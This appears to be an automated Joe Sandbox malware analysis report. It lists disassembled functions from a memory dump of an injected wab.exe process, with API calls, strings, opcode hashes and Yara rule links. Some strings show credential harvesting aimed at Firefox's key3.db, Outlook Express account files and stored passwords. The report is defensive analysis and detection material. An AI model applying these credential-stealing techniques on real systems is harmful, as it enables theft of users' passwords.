                                                                                                                                                                                                                    Function 00413E34 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                                    • String ID: winRead
                                                                                                                                                                                                                    • API String ID: 1297977491-2759563040
                                                                                                                                                                                                                    • Opcode ID: ffe010aae32d2fe9b2a966a78d406535a1fbcfae657499b63a226c622339ee24
                                                                                                                                                                                                                    • Instruction ID: 3967e01906e40ec71704122980e40950556eef8199585a058b54f4718b0c424a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ffe010aae32d2fe9b2a966a78d406535a1fbcfae657499b63a226c622339ee24
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46318B72A00309ABDF10DE69CC86ADE7B69AF84315F14446AF904A7241D734DAA48B99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040A8C2 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                                                      • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040A8F8
                                                                                                                                                                                                                      • Part of subcall function 0041096F: memcpy.MSVCRT ref: 004109DD
                                                                                                                                                                                                                      • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
                                                                                                                                                                                                                      • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040A93D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                                                                                                                                                    • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                                    • API String ID: 3337535707-2769808009
                                                                                                                                                                                                                    • Opcode ID: b0ab3c576635bf4da161b26e96517a42775f10b149b223ac01af6493df536d2f
                                                                                                                                                                                                                    • Instruction ID: b3463478cabe4832a9b1b799bbf2f925c18d395200ae258af25e9b21d14a16f2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b0ab3c576635bf4da161b26e96517a42775f10b149b223ac01af6493df536d2f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3611BF31600225BFEB11AF64CC42F957B64FF04318F10406AF509265A2DB7ABD70DB89
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040717E Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscat$memsetsprintf
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 125969286-0
                                                                                                                                                                                                                    • Opcode ID: cfc2cdd9402285d373237ff41ddaadf9cb54e449d46b0907ea735e806236394e
                                                                                                                                                                                                                    • Instruction ID: 1eb43bd5b8120d09ab0b11fdee56c07fa856cfecb869048c22175c4298d2535e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cfc2cdd9402285d373237ff41ddaadf9cb54e449d46b0907ea735e806236394e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF014C32D0826436F72156159C03BBB77A89B85704F10407FFD44A92C1EEBCE984479A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00408E21 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00408E33
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00408E40
                                                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00408E4B
                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00408E5B
                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00408E77
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4247780290-0
                                                                                                                                                                                                                    • Opcode ID: 06bcd35f29f4ad8b1f8be6fafa23155ea8198cc34ea2cee51d518efb77a86cea
                                                                                                                                                                                                                    • Instruction ID: d5d25afb3259b03ed1d628add5c616d0d22dc24c96253af88726d5856d44a725
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06bcd35f29f4ad8b1f8be6fafa23155ea8198cc34ea2cee51d518efb77a86cea
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E01653680052ABBDB11ABA59C49EFFBFBCFF06750F04402AFD05A2181D77895018BA5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040B6EF Relevance: 7.5, APIs: 5, Instructions: 44windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B70C
                                                                                                                                                                                                                      • Part of subcall function 00406A00: LoadCursorA.USER32(00000000,00007F02), ref: 00406A07
                                                                                                                                                                                                                      • Part of subcall function 00406A00: SetCursor.USER32(00000000), ref: 00406A0E
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B72F
                                                                                                                                                                                                                      • Part of subcall function 0040B65E: sprintf.MSVCRT ref: 0040B684
                                                                                                                                                                                                                      • Part of subcall function 0040B65E: sprintf.MSVCRT ref: 0040B6AE
                                                                                                                                                                                                                      • Part of subcall function 0040B65E: _mbscat.MSVCRT ref: 0040B6C1
                                                                                                                                                                                                                      • Part of subcall function 0040B65E: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B6E7
                                                                                                                                                                                                                    • SetCursor.USER32(?,?,0040C8F2), ref: 0040B754
                                                                                                                                                                                                                    • SetFocus.USER32(?,?,?,0040C8F2), ref: 0040B766
                                                                                                                                                                                                                    • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040B77D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2374668499-0
                                                                                                                                                                                                                    • Opcode ID: 53ade561a914af880d1e6a05375d4a59a2fac5c4dfd76dfdfba0808ab67976fb
                                                                                                                                                                                                                    • Instruction ID: 612281c0e7bcc4a6d3b4da52a7b96f70e992a4283d6ab6b50bd9db3d0aad170a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53ade561a914af880d1e6a05375d4a59a2fac5c4dfd76dfdfba0808ab67976fb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 120129B5200A00EFD726AB75CC85FA6B7E9FF48315F0604B9F1199B272CA726D018F14
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040AA94 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040AAB7
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040AACD
                                                                                                                                                                                                                      • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                                                      • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                                                      • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
                                                                                                                                                                                                                      • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040AB04
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • <%s>, xrefs: 0040AAFE
                                                                                                                                                                                                                    • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AAD2
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                                                    • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                                    • API String ID: 3699762281-1998499579
                                                                                                                                                                                                                    • Opcode ID: d5ee42966936a1138623645e18684dfcccb61381e14bbb228212885f4d89bd19
                                                                                                                                                                                                                    • Instruction ID: a3dff73391336119dc4caae329f843e57b3ce466119e41e431a2bb454e721b3a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5ee42966936a1138623645e18684dfcccb61381e14bbb228212885f4d89bd19
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED01F7729401296AEB20B655CC45FDA7A6CAF45305F0400BAB509B2182DBB49E548BA5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040979F Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                    • Opcode ID: 7a9d4f54567c0a48d1859bf8158ae1996b1b95a3d5575a953b4da3af230d69c1
                                                                                                                                                                                                                    • Instruction ID: ea629a9aafeff6281071dae141f51b3a8c797cef86d835f03ce988520f4efe7f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a9d4f54567c0a48d1859bf8158ae1996b1b95a3d5575a953b4da3af230d69c1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 94F0FF73609B01DBD7209FA99AC065BF7E9AB48724BA4093FF149D3642C738BC54C618
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00409805 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097AB
                                                                                                                                                                                                                      • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097B9
                                                                                                                                                                                                                      • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097CA
                                                                                                                                                                                                                      • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097E1
                                                                                                                                                                                                                      • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097EA
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00409820
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00409833
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00409846
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00409859
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040986D
                                                                                                                                                                                                                      • Part of subcall function 004077E4: ??3@YAXPAX@Z.MSVCRT ref: 004077EB
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                    • Opcode ID: d9c01388865c204718a59a81bbac89ec1da5725ce67048d786a5844de5934490
                                                                                                                                                                                                                    • Instruction ID: 7a7d368fa20b86f0ae4ccc19201ff918d3b0396c1b4e5cf9e7c68f971a3fafa8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9c01388865c204718a59a81bbac89ec1da5725ce67048d786a5844de5934490
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29F03633D1A930D7C6257B66500164EE3686E86B3931942AFF9047B7D28F3C7C5485DE
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004100EC Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406EA5: memset.MSVCRT ref: 00406EC5
                                                                                                                                                                                                                      • Part of subcall function 00406EA5: GetClassNameA.USER32(?,00000000,000000FF), ref: 00406ED8
                                                                                                                                                                                                                      • Part of subcall function 00406EA5: _strcmpi.MSVCRT ref: 00406EEA
                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00410113
                                                                                                                                                                                                                    • GetSysColor.USER32(00000005), ref: 0041011B
                                                                                                                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00410125
                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 00410133
                                                                                                                                                                                                                    • GetSysColorBrush.USER32(00000005), ref: 0041013B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2775283111-0
                                                                                                                                                                                                                    • Opcode ID: 627087e029a1abcb04561e415bb5884c82ccbbb1204662b743e4c0e852913d63
                                                                                                                                                                                                                    • Instruction ID: 15b5804eddbfc7b45e8a586a0394ac07707e7803bdc14c23b44bbc646b24dc1f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 627087e029a1abcb04561e415bb5884c82ccbbb1204662b743e4c0e852913d63
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7DF0F935100508BBDF116FA5DC09EDE3B25FF05711F10813AFA15585B1CBFAD9A09B58
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00405F2B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • BeginDeferWindowPos.USER32(0000000A), ref: 00405F44
                                                                                                                                                                                                                      • Part of subcall function 004015F3: GetDlgItem.USER32(?,?), ref: 00401603
                                                                                                                                                                                                                      • Part of subcall function 004015F3: GetClientRect.USER32(?,?), ref: 00401615
                                                                                                                                                                                                                      • Part of subcall function 004015F3: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 0040167F
                                                                                                                                                                                                                    • EndDeferWindowPos.USER32(?), ref: 00406003
                                                                                                                                                                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 0040600E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                                                                                                                    • String ID: $
                                                                                                                                                                                                                    • API String ID: 2498372239-3993045852
                                                                                                                                                                                                                    • Opcode ID: 4f29eeeafaf0275d54e1a8ac864168a2c968bf72d4383311267dcf3585429308
                                                                                                                                                                                                                    • Instruction ID: 00843a31076853278f863d8e49a3b1dedc6e53575b175ed212c8a3462f8966d2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f29eeeafaf0275d54e1a8ac864168a2c968bf72d4383311267dcf3585429308
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D318F70640259BFEF229B52DC89D6F3A7CFBC5B88F10006DF401792A1CA794F51EA69
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00406868 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,C@,004069F3,00000000,?,?,00000000), ref: 0040688C
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004068B2
                                                                                                                                                                                                                      • Part of subcall function 00407691: ??3@YAXPAX@Z.MSVCRT ref: 00407698
                                                                                                                                                                                                                      • Part of subcall function 00407691: ??2@YAPAXI@Z.MSVCRT ref: 004076A6
                                                                                                                                                                                                                      • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                    • String ID: C@$key3.db
                                                                                                                                                                                                                    • API String ID: 1968906679-1993167907
                                                                                                                                                                                                                    • Opcode ID: 8070846350ac793f35cf726ef4b9da8142e130784681131c85812774ce581970
                                                                                                                                                                                                                    • Instruction ID: 0ede60c3f523747ec885d841e26685764e9001b1461c3323211a21065397dc39
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8070846350ac793f35cf726ef4b9da8142e130784681131c85812774ce581970
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9811D3B2D00514AFDB10AF19CC4588E7BA5EF46360B12807BF80AAB291DB34DD60CB98
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040BFC7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040BFE7
                                                                                                                                                                                                                    • SetFocus.USER32(?,?), ref: 0040C06F
                                                                                                                                                                                                                      • Part of subcall function 0040BFB1: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040BFC0
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FocusMessagePostmemset
                                                                                                                                                                                                                    • String ID: +_@$l
                                                                                                                                                                                                                    • API String ID: 3436799508-640399337
                                                                                                                                                                                                                    • Opcode ID: 5d19dabe06c04104d03c805a20db61bb7ad0843c3c7d2444441ab514d0ecd962
                                                                                                                                                                                                                    • Instruction ID: dfa99e5f235914639cafa3f1faff2c73f9381d0964b1719e4b49f1177e3774cc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d19dabe06c04104d03c805a20db61bb7ad0843c3c7d2444441ab514d0ecd962
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B411A172904198CBDF209B24CC44BCA7BB9AF90304F0900F5A94C7B2D2C7B55E89CFA9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406D65: memset.MSVCRT ref: 00406D6F
                                                                                                                                                                                                                      • Part of subcall function 00406D65: _mbscpy.MSVCRT ref: 00406DAF
                                                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                                                                                                                    • String ID: MS Sans Serif
                                                                                                                                                                                                                    • API String ID: 3492281209-168460110
                                                                                                                                                                                                                    • Opcode ID: 2b978f582ba89fecee05bf5e4b747a5653f5ca03fd4d42c103354d0125bbd5b3
                                                                                                                                                                                                                    • Instruction ID: 91d7546927304a6081eb6d9f577e17eac68e9825403057b28fc40c6b5cfff950
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b978f582ba89fecee05bf5e4b747a5653f5ca03fd4d42c103354d0125bbd5b3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 54F0A775A407047BEB3267A0EC47F4A7BACAB41B41F104535F651B51F2D6F4B544CB48
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00406EA5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClassName_strcmpimemset
                                                                                                                                                                                                                    • String ID: edit
                                                                                                                                                                                                                    • API String ID: 275601554-2167791130
                                                                                                                                                                                                                    • Opcode ID: ed2b804169d995c812202dfe57b894f8811318f38427dff4b8ba9102b7fae148
                                                                                                                                                                                                                    • Instruction ID: 847e1e856ca93c5331a43762777f09d1dcd0b535ae5450603ebfd434222f9f24
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed2b804169d995c812202dfe57b894f8811318f38427dff4b8ba9102b7fae148
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A3E09B73C5412E7AEB21B6A4DC01FE6776CEF55705F0000F7B945E10C1E5B45A888B95
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040732D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: strlen$_mbscat
                                                                                                                                                                                                                    • String ID: 8D
                                                                                                                                                                                                                    • API String ID: 3951308622-2703402624
                                                                                                                                                                                                                    • Opcode ID: 0ec1879d80d4c340dda7a3243aeb4a8038102bdf29c15a79d9befc878d316230
                                                                                                                                                                                                                    • Instruction ID: fdb3abcae466a204d6f595596d606a7769775cd3d87c53e6d0f7ff6b17e0c5bf
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ec1879d80d4c340dda7a3243aeb4a8038102bdf29c15a79d9befc878d316230
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7D0A73390D62027F6153617BC07D8E5BD1CFD0779B18041FF908D2181DD3E8495909D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00443131 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscat$_mbscpy
                                                                                                                                                                                                                    • String ID: Password2
                                                                                                                                                                                                                    • API String ID: 2600922555-1856559283
                                                                                                                                                                                                                    • Opcode ID: dd6d1596d5adc5cb59be199e9a5e42366e44826479dad9da6a8aaa41d84d8c14
                                                                                                                                                                                                                    • Instruction ID: 284e3ed20e01ed0f985c27cc48ee8d5f57cf04e2e68a318951e5723102309710
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dd6d1596d5adc5cb59be199e9a5e42366e44826479dad9da6a8aaa41d84d8c14
